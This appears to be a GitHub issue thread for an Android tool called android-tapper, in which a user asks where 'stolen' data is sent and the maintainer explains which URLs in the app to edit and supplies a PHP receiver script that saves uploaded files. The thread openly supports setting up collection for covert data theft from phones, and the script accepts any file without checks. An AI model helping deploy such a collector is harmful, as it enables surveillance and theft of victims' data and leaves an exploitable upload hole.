### ISSUE TITLE
Steal Data Location

### ISSUE THREAD

**Issue by lawnet** [ringlayer/android-tapper#1]
To where the data is send after tapping. How can I access to those datas, whats the link?

**Comment by ringlayer** [comment]
the method for upload is at https://github.com/ringlayer/android-tapper/blob/master/app/src/main/java/intert/internet/MainActivity.java
line 157.

at line 4-9 in
https://github.com/ringlayer/android-tapper/blob/master/app/src/main/res/values/strings.xml

you need to edit those urls

**Comment by lawnet** [comment]
Okay thanks, can you tell me more about those urls(like what kind of, I'm a bit confuse)  and if possible an installation guide.

**Comment by ringlayer** [comment]
php script for uploader : 

<?php
   if(isset($_FILES['file'])){
      $errors = array();
      $file_name = $_FILES['file']['name'];
      $file_size = $_FILES['file']['size'];
      $file_tmp = $_FILES['file']['tmp_name'];
      $file_type = $_FILES['file']['type'];
      $file_ext=strtolower(end(explode('.',$_FILES['file']['name'])));
       
       move_uploaded_file($file_tmp,"your_path/".$file_name);
       
   }

**Comment by lawnet** [comment]
Alright, this will do thanks.
